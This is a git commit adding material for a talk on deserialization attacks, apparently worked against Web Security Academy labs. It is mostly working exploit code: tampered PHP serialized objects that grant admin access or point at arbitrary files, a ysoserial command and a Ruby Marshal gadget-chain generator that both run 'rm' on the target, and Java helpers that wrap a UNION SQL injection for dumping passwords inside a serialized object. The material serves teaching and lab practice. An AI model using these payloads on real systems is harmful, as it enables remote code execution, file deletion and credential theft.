add deserial attack talk

2020_10_22_54th/deserialtalk/000

@@ -0,0 +1,6 @@
+# Talk based on
+
+# linux system with commands: git, base64, tr
+# alias:
+
+urlencode=$'python3 -c "import sys, urllib.parse as ul; \\\n    print (ul.quote_plus(sys.argv[1]))"

2020_10_22_54th/deserialtalk/001

@@ -0,0 +1 @@
+urlencode $(echo -n 'O:4:"User":2:{s:8:"username";s:6:"wiener";s:5:"admin";b:1;}'|base64|tr -d '\n')

2020_10_22_54th/deserialtalk/002

@@ -0,0 +1,2 @@
+urlencode $(echo -n 'O:4:"User":2:{s:8:"username";s:6:"wiener";s:12:"access_token";i:0;}'|base64|tr -d '\n')
+

2020_10_22_54th/deserialtalk/003

@@ -0,0 +1,5 @@
+# Use Burp to extract post
+
+echo -n '/home/carlos/morale.txt' | wc -c
+
+urlencode $(echo -n 'O:4:"User":3:{s:8:"username";s:5:"gregg";s:12:"access_token";s:32:"vtc9z0s2yv1tk0zmz57l2lanvmeob0el";s:11:"avatar_link";s:23:"/home/carlos/morale.txt";}'|base64|tr -d '\d')

2020_10_22_54th/deserialtalk/004

@@ -0,0 +1,5 @@
+# View Source Code 
+# /libs/CustomTemplate.php
+# => https://id.web-security-academy.net/libs/CustomTemplate.php~
+
+urlencode $(echo -n 'O:14:"CustomTemplate":1:{s:14:"lock_file_path";s:23:"/home/carlos/morale.txt";}'|base64|tr -d '\n')

2020_10_22_54th/deserialtalk/005

@@ -0,0 +1,10 @@
+# git clone https://github.com/frohoff/ysoserial.git
+# cd ysoserial
+# mvn clean package -DskipTests
+# java -jar target/ysoserial-0.0.6-SNAPSHOT-all.jar
+#
+# To show the deserialized content:
+# urldecode $(echo -n 'rO0ABXNyACJkYXRhLnNlc3Npb24udG9rZW4uQWNjZXNzVG9rZW5Vc2Vyc1%2bhUBRJ0u8CAAJMAAthY2Nlc3NUb2tlbnQAEkxqYXZhL2xhbmcvU3RyaW5nO0wACHVzZXJuYW1lcQB%2bAAF4cHQAIGpsMWhpMWlnaDR2OWoyYm0yeTN1aXo0aDF2ZHlvenI4dAAGd2llbmVy')| base64 --decode | strings
+#
+# Attack:
+# urlencode $(java -jar target/ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections4 'rm /home/carlos/morale.txt'|base64|tr -d '\n')

2020_10_22_54th/deserialtalk/007

@@ -0,0 +1,2 @@
+echo -n 'BAhvOglVc2VyBzoOQHVzZXJuYW1lSSILd2llbmVyBjoGRUY6EkBhY2Nlc3NfdG9rZW5JIiVwcmYwejljMDZ0OHI1aXdwY3JrZXJvc293MWM4b3BsbQY7B0YK'|base64 --decode
+

2020_10_22_54th/deserialtalk/007_code/gen_attack.rb

@@ -0,0 +1,69 @@
+#!/usr/bin/env ruby
+
+# Modified version of https://www.elttam.com/blog/ruby-deserialization/ for lab
+class Gem::StubSpecification
+  def initialize; end
+end
+
+
+stub_specification = Gem::StubSpecification.new
+# puts commented and
+# changed payload here
+stub_specification.instance_variable_set(:@loaded_from, "|rm /home/carlos/morale.txt 1>&2")
+
+#puts "STEP n"
+stub_specification.name rescue nil
+#puts
+
+
+class Gem::Source::SpecificFile
+  def initialize; end
+end
+
+specific_file = Gem::Source::SpecificFile.new
+specific_file.instance_variable_set(:@spec, stub_specification)
+
+other_specific_file = Gem::Source::SpecificFile.new
+
+#puts "STEP n-1"
+specific_file <=> other_specific_file rescue nil
+#puts
+
+
+$dependency_list= Gem::DependencyList.new
+$dependency_list.instance_variable_set(:@specs, [specific_file, other_specific_file])
+
+#puts "STEP n-2"
+$dependency_list.each{} rescue nil
+#puts
+
+
+class Gem::Requirement
+  def marshal_dump
+    [$dependency_list]
+  end
+end
+
+payload = Marshal.dump(Gem::Requirement.new)
+
+#puts "STEP n-3"
+Marshal.load(payload) rescue nil
+#puts
+
+
+#puts "VALIDATION (in fresh ruby process):"
+IO.popen("ruby -e 'Marshal.load(STDIN.read) rescue nil'", "r+") do |pipe|
+  pipe.print payload
+  pipe.close_write
+  #puts pipe.gets
+  #puts
+end
+
+#puts "Payload (hex):"
+#puts payload.unpack('H*')[0]
+#puts
+
+
+require "base64"
+#puts "Payload (Base64 encoded):"
+print Base64.encode64(payload)

2020_10_22_54th/deserialtalk/008

@@ -0,0 +1,20 @@
+# cd 008_code
+# javac data/session/token/Starter.java
+#
+# Start to check the sqli:
+# java data.session.token.Starter "' UNION SELECT NULL, NULL, NULL, cast(password as numeric), NULL,    NULL, NULL, NULL FROM users--"
+#
+# The use error based sqli
+#
+# Determine number of columns
+#
+# java data.session.token.Starter "' UNION SELECT NULL, NULL, NULL, ... , NULL"
+#
+# until you know. 
+#
+# Result 8
+#
+# Then use:
+#
+# java data.session.token.Starter "' UNION SELECT NULL, NULL, NULL, cast(password as numeric), NULL, NULL, NULL, NULL FROM users--"
+urlencode $(cat serialsqli.txt|base64|tr -d '\n')

2020_10_22_54th/deserialtalk/008_code/backup_base64_serial_lab

@@ -0,0 +1 @@
+rO0ABXNyACJkYXRhLnNlc3Npb24udG9rZW4uQWNjZXNzVG9rZW5Vc2Vyc1%2bhUBRJ0u8CAAJMAAthY2Nlc3NUb2tlbnQAEkxqYXZhL2xhbmcvU3RyaW5nO0wACHVzZXJuYW1lcQB%2bAAF4cHQAIDdXTEQ0ZEt6Z25IZGFUYzZ4WTJoYmQ3M0h6T08yaGZTdAAGd2llbmVy

2020_10_22_54th/deserialtalk/008_code/data/productcatalog/Product.java

@@ -0,0 +1,11 @@
+package data.productcatalog;
+
+import java.sql.ResultSet;
+
+public class Product
+{
+    public static Product from(ResultSet resultSet)
+    {
+        return new Product();
+    }
+}

2020_10_22_54th/deserialtalk/008_code/data/productcatalog/ProductTemplate.java

@@ -0,0 +1,37 @@
+package data.productcatalog;
+
+import java.io.IOException;
+import java.io.ObjectInputStream;
+import java.io.Serializable;
+import java.sql.Connection;
+import java.sql.ResultSet;
+import java.sql.SQLException;
+import java.sql.Statement;
+
+public class ProductTemplate implements Serializable
+{
+    static final long serialVersionUID = 1L;
+
+    private final String id;
+    private transient Product product;
+
+    public ProductTemplate(String id)
+    {
+        this.id = id;
+    }
+
+    private void readObject(ObjectInputStream inputStream) throws IOException, ClassNotFoundException
+    {
+        inputStream.defaultReadObject();
+    }
+
+    public String getId()
+    {
+        return id;
+    }
+
+    public Product getProduct()
+    {
+        return product;
+    }
+}

2020_10_22_54th/deserialtalk/008_code/data/session/token/AccessTokenUser.java

@@ -0,0 +1,25 @@
+package data.session.token;
+import java.io.*;
+
+public class AccessTokenUser implements Serializable {
+
+    private final String username;
+    private final String accessToken;
+
+    public AccessTokenUser(String username, String accessToken)
+    {
+        this.username = username;
+        this.accessToken = accessToken;
+    }
+
+    public String getUsername()
+    {
+        return username;
+    }
+
+    public String getAccessToken()
+    {
+        return accessToken;
+    }
+
+}

2020_10_22_54th/deserialtalk/008_code/data/session/token/Starter.java

@@ -0,0 +1,19 @@
+package data.session.token;
+
+import java.io.*;
+import data.session.token.AccessTokenUser;
+import data.productcatalog.ProductTemplate;
+
+public class Starter
+{
+    public static void main(String[] args) throws Exception {
+      System.out.println("Using args 1:" + args[0]);
+      ProductTemplate pt = new ProductTemplate(args[0]);
+      // serialization
+      FileOutputStream fos = new FileOutputStream("serialsqli.txt");
+      ObjectOutputStream oos = new ObjectOutputStream(fos);
+      oos.writeObject(pt);
+
+   }
+
+}